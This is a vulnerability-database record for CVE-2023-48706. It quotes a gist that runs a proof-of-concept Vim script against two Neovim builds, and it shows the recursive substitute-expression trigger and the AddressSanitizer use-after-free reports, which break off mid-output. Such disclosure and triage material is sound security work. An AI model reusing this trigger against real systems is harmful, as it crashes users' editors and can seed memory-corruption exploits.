{"uuid": "68f7c78b-5751-43b4-a03c-6663a20e4fe9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-48706", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/6067ed1ca2a2492793f7e001d36dd0f9", "content": "Command:\n./nvim-0.9.5 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting:     aunmenu *\n\nExecuting:     vnoremenu PopUp.Cut                     \"+x\n\nExecuting:     vnoremenu PopUp.Copy                    \"+y\n\nExecuting:     anoremenu PopUp.Paste                   \"+gP\n\nExecuting:     vnoremenu PopUp.Paste                   \"+P\n\nExecuting:     vnoremenu PopUp.Delete                  \"_x\n\nExecuting:     nnoremenu PopUp.Select\\ All             ggVG\n\nExecuting:     vnoremenu PopUp.Select\\ All             gg0oG$\n\nExecuting:     inoremenu PopUp.Select\\ All             VG\n\nExecuting:     anoremenu PopUp.-1-                     \n\nExecuting:     anoremenu PopUp.How-to\\ disable\\ mouse  help disable-mouse\n\nExecuting:   \n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(vim/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling Test_aaaa_substitute_expr_recursive_special()\n\nline 1:   func R()\n\nline 5:   new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706/)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6:   put ='abcdef'\n\nline 7:   let bufnr = bufnr('%')\n\nline 8:   try\n\nline 9:     silent! :s/./~\\=R()/0\n\nline 10:     \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11:     let @/='.'\n\nline 12:     ~g\n\ncalling R()\n\nline 1:     \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2:     %s/./\\='.'/gn\n\n6 matches on 1 line\nR returning #0\n\ncontinuing in Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25534==ERROR: AddressSanitizer: heap-use-after-free on address 0x6020000071f5 at pc 0x00000072d4cb bp 0x7ffc4943b720 sp 0x7ffc4943b718\nREAD of size 1 at 0x6020000071f5 thread T0\n    #0 0x72d4ca in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24\n    #1 0x948f4e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:510:10\n    #2 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n    #3 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n    #4 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n    #5 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n    #6 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n    #7 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n    #8 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n    #9 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n    #10 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n    #11 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n    #12 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n    #13 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n    #14 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n    #15 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #19 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #20 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #21 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #22 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #23 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n    #24 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #25 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #26 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #27 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n    #28 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n    #29 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n    #30 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #31 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #32 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #33 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n    #34 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n    #35 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n    #36 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #37 0x467f7d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x467f7d)\n\n0x6020000071f5 is located 5 bytes inside of 7-byte region [0x6020000071f0,0x6020000071f7)\nfreed by thread T0 here:\n    #0 0x4e043d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e043d)\n    #1 0xca29a9 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:134:3\n    #2 0x9b0bcb in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3081:3\n    #3 0x9b471a in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3387:7\n    #4 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #5 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #6 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #7 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #8 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #9 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #10 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #11 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #12 0x8713a1 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2193:13\n    #13 0x869b68 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3000:15\n    #14 0x867dae in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2742:7\n    #15 0x866bc6 in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2597:7\n    #16 0x865f50 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2467:7\n    #17 0x8658b7 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2399:7\n    #18 0x83a1d7 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2342:7\n    #19 0x830e8c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2280:7\n    #20 0x82f4ff in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:2236:9\n    #21 0x831611 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:871:7\n    #22 0xeb3eca in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1824:31\n    #23 0xeb6431 in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:1696:16\n    #24 0x9b92c3 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3902:20\n    #25 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #26 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #27 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #28 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #29 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n\npreviously allocated by thread T0 here:\n    #0 0x4e06bd in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.9.5+0x4e06bd)\n    #1 0xca2787 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:88:15\n    #2 0xca2954 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:15\n    #3 0xca2ba1 in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:194:15\n    #4 0xca2c18 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:212:17\n    #5 0xca336b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:431:10\n    #6 0x9b4624 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3388:16\n    #7 0x9b311a in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4673:9\n    #8 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #9 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #10 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #11 0x94da2d in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1122:5\n    #12 0x95272e in call_user_func_check /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1259:5\n    #13 0x94a6eb in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1613:17\n    #14 0x948e65 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:495:11\n    #15 0x9656e3 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3074:9\n    #16 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #17 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #18 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #19 0xf4bc61 in do_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:2167:5\n    #20 0xf48a84 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1717:14\n    #21 0xf487e0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/runtime.c:1725:3\n    #22 0x9ea0dc in execute_cmd0 /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1620:7\n    #23 0x9d7caf in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:2282:7\n    #24 0x9cd6ce in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:578:20\n    #25 0x9d0d63 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:281:10\n    #26 0x51fb24 in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1899:5\n    #27 0x512a9c in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:578:5\n    #28 0x7f928d377082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1218:24 in skipwhite\nShadow bytes around the buggy address:\n  0x0c047fff8de0: fa fa 05 fa fa fa 01 fa fa fa 01 fa fa fa fd fd\n  0x0c047fff8df0: fa fa 05 fa fa fa 01 fa fa fa fd fa fa fa fd fd\n  0x0c047fff8e00: fa fa 00 01 fa fa fd fd fa fa fd fa fa fa fd fa\n  0x0c047fff8e10: fa fa fd fa fa fa 01 fa fa fa 00 fa fa fa 01 fa\n  0x0c047fff8e20: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\n=&gt;0x0c047fff8e30: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n  0x0c047fff8e40: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n  0x0c047fff8e50: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n  0x0c047fff8e60: fa fa fd fa fa fa 02 fa fa fa 06 fa fa fa 07 fa\n  0x0c047fff8e70: fa fa 02 fa fa fa fd fa fa fa fd fd fa fa 00 02\n  0x0c047fff8e80: fa fa 06 fa fa fa 02 fa fa fa 02 fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==25534==ABORTING\n\n\nCommand:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S poc -c :qa!\n\nOutput:\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\\(.\\{-}\\)//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! CmdwinEnter [:&gt;] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so poc\n\nline 0: sourcing \"poc\"\nline 1: func Test_aaaa_substitute_expr_recursive_special()\n\nline 19: \n\nline 20: call Test_aaaa_substitute_expr_recursive_special()\n\ncalling function Test_aaaa_substitute_expr_recursive_special()\n\nline 1:   func R()\n\nline 5:   new Xfoobar_UAF\n\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nchdir(/home/zzw/Desktop/CVEID2426/CVE-2023-48706)\nline 5: unlet! b:keymap_name\n\nline 6:   put ='abcdef'\n\nline 7:   let bufnr = bufnr('%')\n\nline 8:   try\n\nline 9:     silent! :s/./~\\=R()/0\n\nline 10:     \"call assert_fails(':s/./~\\=R()/0', 'E939:')\n\nline 11:     let @/='.'\n\nline 12:     ~g\n\ncalling function Test_aaaa_substitute_expr_recursive_special[12]..R()\n\nline 1:     \" FIXME: leaving out the 'n' flag leaks memory, why?\n\nline 2:     %s/./\\='.'/gn\n\n6 matches on 1 line\nfunction Test_aaaa_substitute_expr_recursive_special[12]..R returning #0\n\ncontinuing in function Test_aaaa_substitute_expr_recursive_special\n=================================================================\n==25706==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200003b1f5 at pc 0x000000470b79 bp 0x7ffcce6c53f0 sp 0x7ffcce6c4bb0\nREAD of size 1 at 0x60200003b1f5 thread T0\n    #0 0x470b78 in strlen (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78)\n    #1 0x6c03ef in skipwhite /home/zzw/Desktop/neovim/build/../src/nvim/charset.c:1163:27\n    #2 0x86ce1e in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:474:10\n    #3 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n    #4 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n    #5 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n    #6 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n    #7 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n    #8 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n    #9 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n    #10 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n    #11 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n    #12 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n    #13 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n    #14 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n    #15 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n    #16 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #17 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #18 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #19 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #20 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #21 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #22 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n    #23 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #24 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #25 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n    #26 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n    #27 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n    #28 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #29 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #30 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n    #31 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n    #32 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n    #33 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #34 0x45df4d in _start (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x45df4d)\n\n0x60200003b1f5 is located 5 bytes inside of 7-byte region [0x60200003b1f0,0x60200003b1f7)\nfreed by thread T0 here:\n    #0 0x4d640d in free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d640d)\n    #1 0xb5f304 in xfree /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:122:3\n    #2 0x8b814b in sub_set_replacement /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3260:3\n    #3 0x8c7356 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3546:7\n    #4 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #5 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #6 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #7 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #8 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #9 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #10 0x7a5514 in eval_func /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3304:13\n    #11 0x79fd76 in eval7 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:4232:15\n    #12 0x79cffe in eval6 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3903:7\n    #13 0x79b97c in eval5 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3728:7\n    #14 0x79ad00 in eval4 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3622:7\n    #15 0x79a667 in eval3 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3541:7\n    #16 0x761687 in eval2 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3470:7\n    #17 0x75129c in eval1 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3394:7\n    #18 0x74fb43 in eval0 /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:3351:9\n    #19 0x751a11 in eval_to_string /home/zzw/Desktop/neovim/build/../src/nvim/eval.c:852:7\n    #20 0xd37965 in vim_regsub_both /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6769:23\n    #21 0xd3998a in vim_regsub_multi /home/zzw/Desktop/neovim/build/../src/nvim/regexp.c:6662:16\n    #22 0x8cb552 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4058:20\n    #23 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #24 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #25 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #26 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #27 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #28 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #29 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n\npreviously allocated by thread T0 here:\n    #0 0x4d668d in malloc (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x4d668d)\n    #1 0xb5f062 in try_malloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:74:15\n    #2 0xb5f224 in xmalloc /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:108:15\n    #3 0xb5f66d in xmallocz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:187:15\n    #4 0xb5f6e8 in xmemdupz /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:205:17\n    #5 0xb5fe3b in xstrdup /home/zzw/Desktop/neovim/build/../src/nvim/memory.c:424:10\n    #6 0x8c7260 in do_sub /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:3547:16\n    #7 0x8c4da0 in ex_substitute /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:6016:11\n    #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #10 0x8723c6 in call_user_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1114:5\n    #11 0x86ef33 in call_func /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:1580:11\n    #12 0x86cd35 in get_func_tv /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:459:11\n    #13 0x887a44 in ex_call /home/zzw/Desktop/neovim/build/../src/nvim/eval/userfunc.c:3008:9\n    #14 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #15 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #16 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n    #17 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n    #18 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n    #19 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #20 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #21 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n    #22 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n    #23 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n    #24 0x7f5d9e663082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n\nSUMMARY: AddressSanitizer: heap-use-after-free (/home/zzw/Desktop/NVIM-EXE/nvim-0.6.1+0x470b78) in strlen\nShadow bytes around the buggy address:\n  0x0c047ffff5e0: fa fa 00 fa fa fa 05 fa fa fa 01 fa fa fa 01 fa\n  0x0c047ffff5f0: fa fa 01 fa fa fa fd fd fa fa 05 fa fa fa 01 fa\n  0x0c047ffff600: fa fa fd fd fa fa 00 01 fa fa fd fd fa fa fd fa\n  0x0c047ffff610: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 fa\n  0x0c047ffff620: fa fa 